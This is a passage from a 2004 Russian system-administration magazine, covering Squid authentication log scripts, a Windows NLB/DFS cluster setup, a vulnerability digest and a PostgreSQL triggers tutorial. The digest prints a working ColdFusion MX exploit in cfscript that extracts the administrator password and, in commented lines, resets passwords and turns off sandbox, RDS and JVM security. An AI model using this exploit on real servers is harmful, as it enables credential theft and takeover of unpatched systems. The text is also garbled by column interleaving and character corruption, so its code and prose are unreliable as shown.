нально увеличить количество загружаемых хелперов
(параметр auth_param <method> children). При недоста-
точном количестве хелперов запросы на аутентифика-
цию ставятся в очередь и при переполнении очереди
прокси может аварийно завершить работу. Также сле-
дует обеспечить постоянную доступность контроллера
домена, потому что при плохой связи с контроллером
домена запросы на аутентификацию опять же ставятся
в очередь, и прокси может аварийно завершить работу
при большом количестве хелперов, ожидающих ответа
от контроллера домена.
Дополнительные замечания
О безопасности передаваемых данных
Эксперименты показали, что при использовании всех хел-
перов, кроме ntlm_auth из комплекта Samba 3.х и wb_
ntlmauth из комплекта squid, пароль, передаваемый на про-
верку контроллеру домена, передается в открытом виде, и
лицо, имеющее возможность перехвата сетевого трафика
с данного компьютера, сможет узнать пароли. Программы
ntlm_auth из комплекта Samba 3.х и wb_ntlmauth из комп-
лекта squid используют для работы с контроллером доме-
на протокол NTLM SSP, и пароль не передается по сети в
открытом виде даже при указании --helper-protocol=squid-
2.5-basic (этот параметр определяет не протокол работы
хелпера с контроллером домена, а протокол работы хелпе-
ра со сквидом).
О преобразовании логинов
из формата MYDOMAIN\myusername
Хелпер wb_ntlmauth записывает в лог полученный от пользо-
вателя логин в виде MYDOMAIN\myusername, в то время
как хелпер wb_auth записывает его в формате myusername.
 администрирование
Для того чтобы использовать полученные данные в какой- # This is a part of SquidCount package version 1.11.4
либо программе расчета статистики, необходимо унифи- # Squid log preparation to count statistic
# Developed by Rashid N. Achilov. Copyright Granch Ltd. (C)
цировать данные. Я делаю это удалением домена и приве- # Thisi is a public software, distributed with BSD license.
дением всех логинов к формату myusername. Для этого # Externals: hosts = <list of hosts with trusted users>
# tusers = <list of trusted user logins, correspoding hosts)
мной была разработана пара скриптов на языках shell и awk, #
которые делают следующее: # When $8 is "-" and $2 == one of trusted hosts, instead
# of "-" sets trusted login, correspond this host
! Удаляют из лога строки TCP_DENIED/407, которые ге- # When $4 is "TCP_DENIED/407" skip this line (and f*ck MS IE!)
нерируются браузером Internet Explorer. # $Id: awksquid,v 1.11.4.2 2003/08/06 03:28:54 shelton Exp $
! Удаляют доменную часть имени пользователя, если оно BEGIN {
представлено в формате MYDOMAIN\myusername. split(hosts,harray)
split(tusers,tuarray)
! Если DNS-имя компьютера или его IP-адрес совпадает }
с DNS-именем или IP-адресом, указанным в файле до- {
веренных адресов, то в поле имени пользователя впи- if ($4 == "TCP_DENIED/407")
сывается имя, указанное в данном файле. (Если исполь- next
зуется как авторизация по регистрационному имени, так subind = index($8,"\\")
и авторизация по IP-адресу, то для обработки статисти- if (subind != 0)
ки некоторым IP-адресам жестко сопоставляется опре- {
деленное имя.) Формат файла доверенных адресов subname = substr($8,subind + 1)
printf("%s %6s %s %s %s %s %s %s %s %s\n", ↵
очень прост: по одной записи на строке DNS-имя или $1,$2,$3,$4,$5,$6,$7,subname,$9,$10)
IP-адрес компьютера и через пробел – имя пользовате- next
}
ля, которое будет подставляться. Например:
for (i = 1;harray[i] != "";i++)
{
192.168.1.1 alice if ($3 == harray[i])
192.168.1.2 bob {
if ($8 == "-")
Ниже приведен основной скрипт. Вариант, демонстри- {
руемый в данной статье, тестовый, практической ценности printf("%s %6s %s %s %s %s %s %s %s %s\n", ↵
$1,$2,$3,$4,$5,$6,$7,tuarray[i],$9,$10)
не имеет и приведен только для иллюстрации того, как об- break
рабатывать данные файла регистрационного журнала. }
}
}
#!/bin/sh
# This is a part of SquidCount package version 1.11.4 if (harray[i] == "")
# Daily squid proxy statistic maintenance print $0
# Written by CityCat 25.10.2001. Copyright Granch Ltd. (C) }
# This is a public software, distributed with a BSD license.
# $Id: squidcount,v 1.11.4.6 2004/07/21 12:53:02 shelton Exp $
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local ↵
Заключение
/bin:/usr/local/sbin В данной статье были рассмотрены несколько способов
авторизации пользователя домена Windows на прокси-сер-
trustlist="/usr/local/etc/sarg2/sargtrusted"
inlog="/var/log/squid/access.log" вере squid с использованием контроллера домена Windows.
Выбор конкретного способа зависит только от используе-
# Check on presence trusted hosts list
if [ -e $trustlist ]; then мой версии Samba и не зависит от типа контроллера доме-
hosts=`awk '{if ($1 == "#") nextline; else print $1}' ↵ на Windows (схема с авторизацией через Samba 2.х и хел-
< $trustlist`
tusers=`awk '{if ($1 == "#") nextline; else print $2}' ↵ перы Squid работала достаточно долгое время в домене
< $trustlist` Windows NT, потом совершенно незаметно была перенесе-
else
logger -i -p daemon.err -t sqcount ↵ на в домен Windows 2000). Samba 3.x мне кажется наибо-
Trust list empty, will skip prepare 1st stage... лее перспективным решением с наиболее простым вари-
hosts=""
tusers="" антом конфигурации.
fi

# When trusted host list is presented, replace according

# by them...
if [ ${#hosts} -ne 0 ]; then
Уважаемые читатели!
awk -f /usr/local/sbin/awksquid -v hosts="$hosts" ↵
-v tusers="$tusers" < $inlog > /tmp/tmpaccess.log Теперь вы можете приобретать новые и старые
else
cp $inlog /tmp/tmpaccess.log номера журнала через интернет-магазин
fi

Далее приведен скрипт чтения файла регистрационно-

го журнала, реализованный на языке awk. Это рабочий
скрипт, который я использую для расчета статистики заг- Стоимость 1 экземпляра – 140 рублей
рузки канала.
Доставка почтой БЕСПЛАТНО в любую точку России
#!/usr/bin/awk -f

№10(23), октябрь 2004 35

 администрирование
ЧЕТЫРЕХУЗЛОВОЙ КЛАСТЕР
С БАЛАНСИРОВКОЙ НАГРУЗКИ
БЕЗ ВНЕШНЕГО МАССИВА ДАННЫХ
Месяца 3-4 назад к нам на фирму за консультацией при-
шли сотрудники одной из крупных государственных орга-
низаций. Для тестовой лаборатории им необходимо было
собрать недорогой кластер под вывод информации для
пользователей через Internet Information Server (IIS). После
некоторых раздумий и консультаций с умными людьми мной
было найдено довольно оригинальное решение, о нем я и
буду сегодня рассказывать.
О том, какие бывают кластеры, технологии, реализации
кластеров в этой статье, я писать не буду. В Интернете до-
статочно информации на эти темы. Здесь я опишу конкрет-
ную реализацию конкретной задачи. Надеюсь, она будет
вам интересна.
Задача
Для одного из учебных классов государственного пред-
приятия потребовалось создать кластер для работы с про-
ектно-исследовательской информацией. Важным момен-
том в данной реализации было то, что внешние клиенты
могли работать с данной документацией через самый про-
стой IIS. В качестве узлов кластера были закуплены 4 ма-
шины достаточно простой конфигурации, P4-2.4 ГГц/512 Мб/
Ðèñóíîê 1
36
ГЕННАДИЙ ДМИТРИЕВ
80 Гб SATA/2xLAN Adapter. После некоторых раздумий было
решено использовать службу Network Load Balancing для
распределения нагрузки между узлами кластера, а синх-
ронизацию данных между серверами настроить с помощью
службы Distributed File System. В качестве операционной
системы достаточно выбрать Windows 2003 Server Standard
Edition, поскольку она поддерживает обе необходимые нам
службы.
Схема кластера представлена на рис. 1.
1-й этап. Подготовка серверов,
установка домена, создание DNS-зон
На первом этапе мы устанавливаем на все сервера, опера-
ционную систему, настраиваем сетевое окружение на сер-
верах, поднимаем Active Directory. В принципе можно обой-
тись и без него, однако мне показалось, что единая авто-
ризация на серверах удобнее, чем ведение учетных запи-
сей на каждом из них.
! Имеем 4 одинаковые машины с двумя сетевыми карта-
ми в каждой.
! Ставим на все машины Windows 2003 Server (версия
2003-го сервера не имеет значения).
 администрирование
! Настраиваем системы, исходя из таблицы:

! Для удобства переименуем название сетевых соедине-

ний, как Private и Public Cluster Connection, соответствен-
но для кластерного и общего соединений.
! На первом сервере NODE1 поднимаем Active Directory
«cluster.local». Все ставим по умолчанию.
! Проверяем DNS-записи серверов на основном контрол-
лере домена. Ðèñóíîê 3
! Удаляем зону «.». Поднимаем forward (обратную) зону ! На вкладке Port Rules можно указать, на какие порты IP
Active Directory Integrated. будет отзываться кластер. Здесь можно либо ограни-
! Включаем остальные машины в домен в качестве Stand чить отклик только на определенные порты вроде пор-
Alone Server. та сервера IIS, либо оставить по умолчанию и настро-
ить позже:
2-й этап. Поднятие NLB-кластера
На этом этапе мы настраиваем службу NLB (Network Load
Balancing). Вообще, честно говоря, эта служба имеет очень
отдаленное отношение к понятию кластеров. Но уж так сло-
жилось, что Microsoft назвала эту службу службой класте-
ра. Как говорится, Microsoft by Design.
Все операции по созданию такого кластера проводятся
на первом сервере с помощью оснастки «Network Load
Balancing Manager».
! Переходим на первый сервер. Запускаем NLB Manager.
! Правой кнопкой на «Network Load Balancing Clusters» →
Create New Cluster.
! В первом окне заполняем поля с адресом, маской под-
сети и названием кластера:

Ðèñóíîê 4
! На вкладке Connect выбираем первый сервер NODE1
и выбираем внешний интерфейс «Public Cluster
Connection», на котором будет «висеть» служба NLB.

Ðèñóíîê 2
! На вкладке Cluster IP Address (рис. 3) можно ввести до-
полнительные адреса кластера. Мы пропускаем этот
этап. Ðèñóíîê 5

№10(23), октябрь 2004 37

администрирование
! Все настройки первого узла в кластере можно свести в
таблицу:

! По окончании синхронизации данных получаем карти-

ну:

Ðèñóíîê 8

3-й этап. Настройка IIS,

настройка репликации данных
Третий этап по сути заключительный. На нем мы корректи-
руем настройки IIS на всех четырех серверах и поднимаем
репликацию содержимого IIS с первого узла в кластере на
остальные. Все операции выполняются на первом сервере
с помощью оснастки «Distributed File System Manager».
! Проверяем, чтобы на всех узлах был установлен IIS в
одинаковой конфигурации. Состав пакетов значения не
Ðèñóíîê 6 имеет, просто лучше, если на всех узлах будет одна кон-
! После создания кластера из одного узла и генерации фигурация.
самого кластера подключаем остальные 3 узла. ! На первом узле создаем директорию «C:\IIS».
! Правой кнопкой в NLB Manager на созданном класте- ! Запускаем DFS Manager (Distributed File System Mana-
ре → «Add new host for cluster». ger).
! В окошке «Connect» выбираем по очереди NODE2, ! На вкладке «Root Type» выбираем тип «Domain Root»:
NODE3, NODE4 и для каждого из узлов выбираем «Public
Cluster Connection».
! После всех процедур и генерации кластера в оснастке
NLB Manager добавятся остальные узлы. В этой же ос-
настке мы сможем изменять параметры кластера, па-
раметры узлов, как показано на рис. 7, 8.

Ðèñóíîê 9
! На вкладке «Host Domain»выбираем наш кластер
«cluster.local»:

Ðèñóíîê 7 Ðèñóíîê 10

38
 администрирование
! На вкладке «Host Server» выбираем первый сервер
node1.cluster.local:

! После создания корневой директории определяем об-

щий доступ для каталога с содержимым IIS-сервера
«C:\Inetpub\wwwroot».
! В DFS Manager выбираем «New Link», вводим имя ссыл-
ки. В поле «Path to Target» выбираем директорию с со-
держимым IIS-сервера, предоставленную в общий дос-
туп, как показано на рисунке:

Ðèñóíîê 11
! На вкладке «Root Name» вводим имя корневого катало-
га:

Ðèñóíîê 14
! Остальные операции по созданию конечных ссылок мож-
но будет проводить в оснастке «Distributed File System
Manager»:

Ðèñóíîê 12
! На вкладке «Root Share» выбираем созданный нами
каталог «C:\IIS»:
Ðèñóíîê 15
! Далее необходимо создать ссылки на остальные сер-
вера кластера. Для этого на каждом из узлов предос-
тавляем в общий доступ каталоги с содержимым IIS-
сервера.
! Выбираем «New Target» и по очереди добавляем остав-
шиеся три узла:

Ðèñóíîê 13
! Все настройки корневого каталога можно свести в таб-
лицу: Ðèñóíîê 16

№10(23), октябрь 2004 39

администрирование
! После создания ссылки на второй узел нам будет пред-
ложено настроить репликацию между узлами кластера.
Соглашаемся, выбираем первый узел (рис. 17). В каче-
стве топологии репликации определяем ручной режим,
как показано на рис. 18.
Ðèñóíîê 17
Ðèñóíîê 18
! Топологию время репликации мы можем изменить в лю-
бое время из оснастки «DFS Manager». Для репликации
данных с первого узла на оставшиеся выбираем руч-
ной режим, как показано на рис. 19, 20.
Ðèñóíîê 19
40
Ðèñóíîê 20
! После создания всех ссылок необходимо определенное
время для предварительной синхронизации данных уз-
лов. Обычно это занимает около 20-30 минут. Далее
репликация данных будет проходить мгновенно, ну или
почти мгновенно (по внутренней сети кластера). Резуль-
таты наших настроек наблюдаем в DFS Manager:
Ðèñóíîê 21
! Хочется также упомянуть, что репликация данных меж-
ду серверами проходит от имени «System Account», по-
этому при создании общего доступа к каталогам содер-
жимого IIS-серверов достаточно прав на чтение. По
крайней мере, у меня данный режим работал без осо-
бых проблем.
4-й этап. Последние штрихи
Последним штрихом у нас будет создание DNS-записи со
ссылкой на внешний адрес кластера. Заходим в DNS
Manager и создаем запись CNAME → www.cluster.local →
cluster.cluster.local. Делаем это для того, чтобы при заходе
на ссылку www.cluster.local мы автоматически попадали на
внешний адрес кластера. В результате NLB будет разрули-
вать ситуацию с нагрузкой на узлы кластера, а DFS помо-
жет автоматически реплицировать данные с первого узла
на остальные. Вот вроде и все.
Заключение
Данный документ не является панацеей по созданию клас-
теров, он лишь отражает мой опыт в создании нестандарт-
ных систем. На некоторых рисунках вы видите только два
узла. Однако настройки остальных серверов идентичны и
не представляют особой сложности.
Хочется выразить глубокую благодарность за неоцени-
мую интеллектуальную помощь Андрееву Павлу, систем-
ному администратору Novavox.

Раскрытие пароля администратора
в ColdFusion MX
Программа: ColdFusion MX 6.1.
Опасность: средняя.
Описание: Уязвимость обнаружена в ColdFusion MX. Уда-
ленный авторизованный пользователь, способный созда-
вать ColdFusion-шаблоны, которые содержат тэги Create
Object и cfobject, может создать шаблон, чтобы получить
доступ к паролю администратора. Пример:
<cfscript>
objFileWriter = CreateObject("java","java.io.FileWriter");
objByteArray = CreateObject("java", ↵
"java.io.ByteArrayOutputStream");
objJavaC = CreateObject("java","sun.tools.javac.Main");
objString = CreateObject("java","java.lang.String");
objFile = CreateObject("java","java.io.File");
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }
strJavaSource = "#Server.ColdFusion.Rootdir##s ↵
#lib#s#SecurityExploit.java";
strCfusionJar = "#Server.ColdFusion.Rootdir##s ↵
#lib#s#cfusion.jar";
strNeoSecFile = "#Server.ColdFusion.Rootdir##s ↵
#lib#s#neo-security.xml";
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s ↵
#password.properties";
fileWriter = objFileWriter.init("#strJavaSource#",false);
fileWriter.write("import coldfusion.security. ↵
SecurityManager;");
fileWriter.write("import java.io.File;");
fileWriter.write("public class SecurityExploit ↵
extends SecurityManager {");
fileWriter.write("public SecurityExploit(File arg0, ↵
File arg1) {");
fileWriter.write("super(arg0, arg1); }");
fileWriter.write("public boolean isAdminSecurityEnabled(){");
fileWriter.write("return false;}}");
fileWriter.flush();
fileWriter.close();
str = objString.init("-classpath,#strCfusionJar#, ↵
#strJavaSource#");
strArr = str.split(",");
byteArray = objByteArray.init();
compileObj =objJavaC.init(byteArray,str);
compileObj.compile(strArr);
obj = CreateObject("java","SecurityExploit");
file1 = objFile.init("#strNeoSecFile#");
file2 = objFile.init("#strPasswdFile#");
obj.init(file1,file2);
obj.load();
</cfscript>
<cfscript>
// Get Administrator Password
strAdminPw = obj.getAdminPassword();
// Set Administrator Password
//obj.setAdminPassword("test123");
// Turn off Sandbox Security
//obj.setSandboxSecurityEnabled(false);
// Turn off Administrator Login
//obj.setAdminSecurityEnabled(false);
// Turn off RDS Login
//obj.setRdsSecurityEnabled(false);
// Set RDS Password
//obj.setRdsPassword("test123");
// Turn off JVM Security
//obj.setJvmSecurityEnabled(false);
</cfscript>
URL производителя: http://www.macromedia.com.
Решение: Способов устранения обнаруженной уязвимос-
ти не существует в настоящее время.
№10(23), октябрь 2004
bugtraq
Удаленный отказ в обслуживании
в RealNetworks Helix Universal Server
Программа: RealNetworks Helix Universal Server 9.0.4.958 и
более ранние версии.
Опасность: средняя.
Описание: Удаленный пользователь может послать специ-
ально сформированный HTTP POST-запрос с Content-
Length-заголовком, установленным к «-1», чтобы заставить
целевой сервер использовать чрезмерное количество па-
мяти и ресурсов CPU. Для восстановления нормальной ра-
боты требуется перезагрузка сервера.
URL производителя: http://service.real.com/help/faq/
security/security100704.html.
Решение: Установите обновленную версию сервера
(9.0.4.960).
Удаленный доступ к произвольным
файлам в Samba
Программа: Samba 2.2 – 2.2.11, 3.0 – 3.0.5.
Опасность: средняя.
Описание: Удаленный пользователь может получить дос-
туп к файлам, расположенным вне общедоступного пути.
Уязвимость в проверке правильности входных данных
обнаружена в обработке MS-DOS-имен путей. Удаленный
пользователь может эксплуатировать этот недостаток, что-
бы получить доступ к файлам на целевой системе, кото-
рые расположены вне общедоступного пути, определенно-
го в smb.conf. Файлы могут быть просмотрены с привиле-
гиями целевой учетной записи.
URL производителя: http://www.samba.org.
Решение: Установите обновленную версию SAMBA (2.2.12):
http://samba.org/samba/ftp/samba-2.2.12.tar.gz.
Удаленное выполнение произвольного
кода в Microsoft Windows NT/2000/2003
Опасность: критическая.
Описание: Уязвимость обнаружена в Microsoft Windows NT/
2000/2003. Удаленный пользователь может представить
специально обработанное, чрезмерно длинное сообщение,
чтобы вызвать переполнение буфера в NNTP (Network News
Transfer Protocol) компоненте. Успешная эксплуатация по-
зволяет выполнить произвольный код на целевой системе,
в которой используется NNTP.
URL производителя: http://www.Microsoft.com.
Решение: Установите соответствующее обновление.
Многочисленные переполнения
буфера в IBM DB2
Программа: DB2 8.1 Fixpak 7 и более ранние версии.
Опасность: высокая.
Описание: Обнаружено несколько переполнений буфера
в IBM DB2 Universal Database. Удаленный атакующий мо-
жет выполнить произвольный код на уязвимой системе.
URL производителя: http://www.ibm.com.
Решение: Установите Fixpaсk 6a и 7a с сайта произво-
дителя: http://www.ibm.com/software/data/db2/udb/support/
downloadv8.htm.
Составил Александр Антипов
41
 администрирование
PostgreSQL: ФУНКЦИИ И ТРИГГЕРЫ
Система управления базами данных PostgreSQL обладает
очень мощными средствами, делающими возможным пе-
ренос части так называемой бизнес-логики приложения со
стороны клиента (по отношению к СУБД) на сторону серве-
ра. При этом сокращается, и порой существенно, трафик
между клиентом и сервером, упрощается сопровождение
разработанного приложения (сервер один, а клиентов мо-
жет быть много), повышается надежность в плане целост-
ности данных, в ряде случаев становится проще и сам ал-
горитм работы приложения.
Данная статья посвящена рассмотрению одного из наи-
более эффективных средств – триггеров. Все примеры те-
стировались на PostgreSQL 7.4.2, работающей на системе
FreeBSD 5.2.
Для примера разработаем функцию оформления зака-
за в простом интернет-магазине, отличительной особенно-
стью которой будет максимально возможный перенос всей
логики на сторону СУБД.
Итак, пользователь выбрал интересующий его товар и
нажал ссылку «Купить». Далее необходимо:
1. Занести в БД информацию о поступлении заказа.
2. Проверить, есть ли необходимое количество товара на
складе.
3. Если есть – зарезервировать товар, уменьшив при этом
остаток на складе. Если необходимого количества на
складе нет, то проверить, не находится ли в резерве нуж-
ный товар свыше 5 дней. Если такое имеется и количе-
ство товара по просроченным заказам достаточно для
исполнения текущего, то просроченные заказы нужно ан-
нулировать, а товар резервировать для нового заказа.
4. При свободном остатке того или иного товара на скла-
де меньше определенного значения сформировать за-
пись в таблице предупреждений.
42
СЕРГЕЙ СУПРУНОВ
5. Все «нештатные» ситуации (невозможность зарезерви-
ровать требуемое количество, аннулирование неопла-
ченного заказа) должны отражаться в таблице предуп-
реждений.
Операции выставления счетов, получения оплаты и т. д.
для простоты возложим на менеджеров компании. Методы
их взаимодействия с базой данных рассматривать в дан-
ной статье не будем. Также не будем резервировать товар
частично, если необходимого количества не оказалось –
пусть этим тоже занимаются менеджеры. Для наглядности
алгоритм того, как должно вести себя наше приложение,
представлен на рис. 1.
Итак, попытаемся решить сформулированные выше за-
дачи без помощи «внешнего» сценария, по одному-един-
ственному запросу к СУБД.
Структура БД для нашей задачи будет следующая:
! Таблица «Заказы», orders:
! Идентификатор заказа, order_id, serial.
! Информация о покупателе, customer, varchar.
! Идентификатор товара, goods_id, numeric(3).
! Количество единиц товара, count, numeric(2).
! Цена товара, по которой делается заказ, price,
numeric(7,2).
! Дата заказа, date, date.
! Таблица «Товары», goods:
! Идентификатор товара, goods_id, serial.
! Описание товара, goods, varchar.
! Минимальный остаток на складе, rest, numeric(2).
! Таблица «Склад», warehouse:
! Идентификатор товара, goods_id, numeric(3).
! Количество, count, numeric(5).
! Таблица «Резерв», reserved:
 администрирование
!Идентификатор заказа, order_id, numeric(5). create table orders(order_id serial,
!Идентификатор товара, goods_id, numeric(3). customer varchar,
goods_id numeric(5),
!Зарезервированное количество, count, numeric(2). date date,
!Дата резервирования, date, date. count numeric(3),
price numeric(7,2));
! Таблица «Предупреждения», warnings: create table goods(goods_id serial,
! Дата и время записи, date_time, timestamp. goods varchar,
rest numeric(2));
! Содержание записи, messages, text. create table warehouse(goods_id numeric(5),
! Дочерняя таблица order_warnings. count numeric(5));
create table reserved(goods_id numeric(5),
! Идентификатор заказа, order_id, numeric(5). order_id numeric(5),
! Дочерняя таблица goods_warnings. count numeric(3),
date date);
! Идентификатор товара, goods_id, numeric(3). create table warnings(date date, message text);
create table order_warnings(order_id numeric(5))
inherits(warnings);
Поскольку предупреждения могут быть связаны как с create table goods_warnings(goods_id numeric(5))
заказом, так и с товаром, то для повышения наглядности inherits(warnings);
воспользуемся такой возможностью PostgreSQL, как насле- Далее, нам нужно убедиться, что процедурный язык PL/
дование таблиц. Родительская таблица warnings будет со- pgSQL доступен в созданной базе. Для этого выполните
держать все предупреждения, а дочерние order_warnings и следующую команду:
goods_warnings – дополнять ее идентификаторами соответ-
ствующего заказа или товара. select * from pg_language;
Для решения указанных задач, как нетрудно догадать-
ся, будем использовать триггеры. Напомню, что триггер – Если plpgsql в полученном результате отсутствует, то
это связь хранимой процедуры с одной (или несколькими) из командной оболочки вашей ОС выполните следующую
из операций модификации, выполняемых над таблицей команду:
(UPDATE, INSERT, DELETE), автоматически запускающая
эту процедуру (функцию) при получении соответствующе- $ createlang –U pgsql plpgsql eshop
го запроса. Нам понадобятся «базовый» триггер, выполня-
емый после операции добавления записи (INSERT) в таб- Опция –U задает пользователя – администратора БД,
лицу orders – для решения задач 1-3, и триггер на опера- от имени которого будет выполняться данная операция.
цию UPDATE таблицы warehouse для контроля обязатель- Поддержка языка может быть включена и из програм-
ных остатков (задача 4). Функцию записи предупреждений мы-клиента (например, psql) выполнением следующих двух
каждый из этих триггеров будет выполнять в соответствии команд:
со своей «зоной ответственности».
Итак, создадим базу данных eshop, в которой и будем create function plpgsql_call_handler()
returns language_handler
экспериментировать. В ней создаем структуру нашей БД: as ‘$libdir/plpgsql’, ‘plpgsql_call_handler’

Ðèñóíîê 1

№10(23), октябрь 2004 43

 администрирование
language ‘c’;
create trusted procedural language ‘plpgsql’
handler plpgsql_call_handler;
Первая из них создает функцию-обработчик на базе
библиотечной функции, вторая – собственно язык PL/pgSQL
на основе созданного выше обработчика.
Если вы считаете, что процедурный язык будет нужен
вам во всех (или большинстве) базах данных, то таким же
образом его можно добавить в БД template1. В результате
этого поддержка PL/pgSQL будет автоматически добав-
ляться во все создаваемые впоследствии базы (при со-
здании новой базы по умолчанию в нее переносятся все
объекты из БД template1, хотя шаблон может быть задан
и явно, указанием параметра TEMPLATE в команде CREATE
DATABASE).
Сначала немного теории. Триггер связывает функцию с
операцией модификации таблицы. Следовательно, чтобы
было что связывать, мы должны создать триггерную функ-
цию. Синтаксис функции на языке PL/pgSQL следующий:
create [or replace] function <èìÿ ôóíêöèè>(<àðãóìåíòû>)
returns <òèï âîçâðàòà> as ‘<òåëî ôóíêöèè>’
language ‘plpgsql’;
Есть и другие опции. С ними можно ознакомиться в до-
кументации, а сейчас они нам не интересны. Необязатель-
ная фраза «or replace» позволяет перезапись функции при
попытке создать другую с таким же именем (например, за-
писать исправленный вариант). Без этого ключевого слова
будет сгенерирована ошибка и потребуется сначала уда-
лить существующую функцию и лишь затем записать на ее
место новую.
Скобки после имени функции обязательны, даже если
функция не имеет аргументов. Слово «returns» задает тип
возвращаемых функцией данных. Указание языка также
обязательно. В нашем случае это «plpgsql».
Тело функции имеет следующую структуру:
DECLARE
íåîáÿçàòåëüíûé ðàçäåë îïðåäåëåíèé
BEGIN
Îïåðàòîðû ôóíêöèè
END;
Последним оператором функции должен быть оператор
«return», возвращающий данные указанного выше типа,
даже если выход из функции осуществляется раньше (на-
пример, в блоке проверки условия) и эта команда никогда
не получит управление.
Как и любой нормальный язык программирования, PL/
pgSQL позволяет оперировать переменными. Все перемен-
ные (за одним исключением, о котором будет упомянуто
ниже) должны быть описаны в разделе DELCARE, т.е. их
необходимо перечислить с указанием типа данных. В этом
же разделе допускается и инициализация переменной на-
чальным значением с помощью ключевого слова DEFAULT.
Общий синтаксис описания следующий:
<ïåðåìåííàÿ> <òèï> [ DEFAULT <çíà÷åíèå>];
Вместо слова «DEFAULT» допускается использование
оператора присваивания «:=», но, на мой взгляд, такая за-
44
пись выглядит несколько коряво. Точка с запятой в конце
каждого описания обязательна. Переменная может быть
любого типа, который поддерживается в PostgreSQL. Кроме
того, существуют три специальных типа данных: RECORD,
table%RECTYPE и table.field%TYPE. Первый описывает за-
пись любой таблицы, второй – запись указанной таблицы
table, третий создает переменную такого же типа, как и тип
указанного поля field таблицы table. Примеры использова-
ния этих типов данных будут приведены ниже.
В основной секции, заключенной в операторные скобки
BEGIN-END, могут использоваться операторы присваива-
ния, математические операторы, ветвления, циклы, вызо-
вы других функций. Кроме того, тело функции может со-
держать вложенные блоки, имеющие ту же структуру (т.е.
DECLARE-BEGIN-END). Видимость переменных распрост-
раняется на блок, в котором она описана, и на все вложен-
ные блоки. Ниже конспективно перечислены основные опе-
раторы языка PL/pgSQL, которые понадобятся нам в даль-
нейшем:
! Оператор присваивания :=. Такой же, как в языке Pascal.
Сопоставляет переменную с некоторым значением или
результатом выражения.
! Оператор ветвления IF-ELSE-END IF. Знакомая всем с
детства конструкция, позволяющая выполнить провер-
ку некоторого условия и в зависимости от результата
проверки перейти на выполнение того или иного блока
команд. Синтаксис:
If <óñëîâèå> then
<îïåðàòîðû;…>
[else
<îïåðàòîðû;…>]
end if;
! Оператор цикла FOR. Наиболее распространенный
цикл. Переменная цикла <var> – то самое исключение,
когда переменная может не описываться в секции
DECLARE. В этом случае зона ее видимости ограничи-
вается циклом. Синтаксис:
For <var> in <start>..<stop> loop
<òåëî öèêëà>
End loop;
Существует вариант этого цикла и для «прохода» по ре-
зультату выборки:
For <row-var> in <select> loop
<òåëî öèêëà>
End loop;
В этом случае в переменную <row-var> последователь-
но подставляются строки из выборки, и тип этой пере-
менной должен быть либо <table>%rowtype, отражаю-
щий запись конкретной таблицы <table>, либо RECORD,
описывающий обобщенную запись таблицы.
С остальными операторами, а также со встроенными
функциями можно познакомиться в документации к языку
PL/pgSQL.
В качестве примера создадим обычную (не триггерную)
функцию, которая занесет в таблицу test1 (позже мы ее
удалим) N случайных чисел. Сейчас польза от этого исклю-

чительно в виде примера, а в принципе таким образом мож-
но, например, заполнять базу для выполнения тестов.
CREATE OR REPLACE FUNCTION inserter(int4)
RETURNS int4 AS
'DECLARE
N alias for $1;
Rand numeric default 0.5;
tmp varchar;
BEGIN
select tablename into tmp
from pg_tables
where tablename = \'test1\';
if tmp is null then
raise exception \'Table test1 not found.\';
else
delete from test1;
end if;
for i in 1..N loop
Rand := random();
insert into test1 values(Rand);
end loop;
return 0;
END;'
LANGUAGE 'plpgsql’;
Этот несложный пример демонстрирует большое коли-
чество особенностей работы функций. Пройдемся по ним
по порядку.
Конструкция «alias for $N» в секции описаний позволя-
ет связать описываемую переменную с другой, описанной
ранее. В данном случае мы устанавливаем связь со стан-
дартными переменными-параметрами. Так, $1 соответству-
ет первому параметру, $2 – второму и т. д. Для удобства
работы передаваемый в функцию параметр мы связываем
с переменной N.
При описании переменной Rand показано, как инициа-
лизировать переменную значением на стадии описания,
хотя в данном случае это и не нужно.
Конструкция «select <список полей> into <список пе-
ременных> …» позволяет сохранять результат выборки в
переменных для дальнейшего использования. Количество
переменных должно соответствовать количеству выбира-
емых полей. В данном случае мы проверяем, есть ли в
нашей БД нужная нам таблица test1. Если она существу-
ет, то в служебной таблице pg_tables для нее будет за-
пись. В противном случае переменная tmp получит псев-
дозначение NULL.
Также обратите внимание на необходимость экраниро-
вания всех кавычек, встречающихся в теле функции, по-
скольку оно уже заключено в кавычки как параметр коман-
ды create function (в дальнейшем, приводя листинги функ-
ций, я для простоты чтения символы экранирования буду
опускать).
Далее проверяем, содержит ли переменная tmp какое-
нибудь значение, и если нет – генерируем исключение (ко-
манда «raise exception»), по которому наша функция ава-
рийно завершится.
Если же таблица test1 существует, то очищаем ее от
старых значений (если таковые имеются) и приступаем к
заполнению ее случайными числами, для генерации кото-
рых используется внутренняя функция random(), возвраща-
ющая случайное число в диапазоне 0..1.
Выполнить функцию можно с помощью такого запроса:
select inserter(5);
№10(23), октябрь 2004
администрирование
Запустите ее и убедитесь, что выполнение функции за-
вершилось ошибкой «Table test1 not found.». Далее созда-
ем нужную таблицу и повторяем выполнение функции:
create table test1 (rnd numeric);
select inserter(5);
select * from test1;
Как видите, на этот раз все 5 записей послушно доба-
вились. Причем добавить 500 000 записей будет столь же
просто. А теперь попробуйте посчитать трафик и число об-
ращений к серверу баз данных, если эту задачу решать с
помощью внешнего сценария на Perl, который будет выпол-
няться на другой машине… Пользуясь случаем, давайте за-
одно оценим скорость выполнения операций вставки и уда-
ления (машина Cel466/64 Мб с полным «джентльменским
набором» – Apache, Squid, Sendmail; load average ~0.1):
Третья команда помимо добавления пяти записей вклю-
чала в себя удаление пятисот тысяч. Высокое время вы-
полнения 4-й и 5-й команд объясняются значительной сте-
пенью фрагментации БД после удаления, хотя видна тен-
денция улучшать результат с каждым разом (оптимизатор-
то не дремлет). Ну и «полный вакуум» с опцией анализа в
комментариях не нуждается («лучше день потерять, зато
потом за пять минут долететь»).
Нужно указать еще одну особенность: PostgreSQL выпол-
няет кэширование функций, и при этом использует не имена
таблиц, а их OID (Object Identifier). В результате, если теперь
удалить таблицу test1, а потом создать ее повторно, то по-
пытка выполнить функцию inserter завершится неудачей:
ERROR: связь с OID 29481 не существует
CONTEXT: PL/pgSQL function "inserter" line 10 at SQL statement
Чтобы восстановить работоспособность функции, ее
придется пересоздать, повторно выполнив команду «create
or replace function…».
Теперь несколько слов о триггерных функциях. От обыч-
ных они отличаются тем, что тип возврата у них должен быть
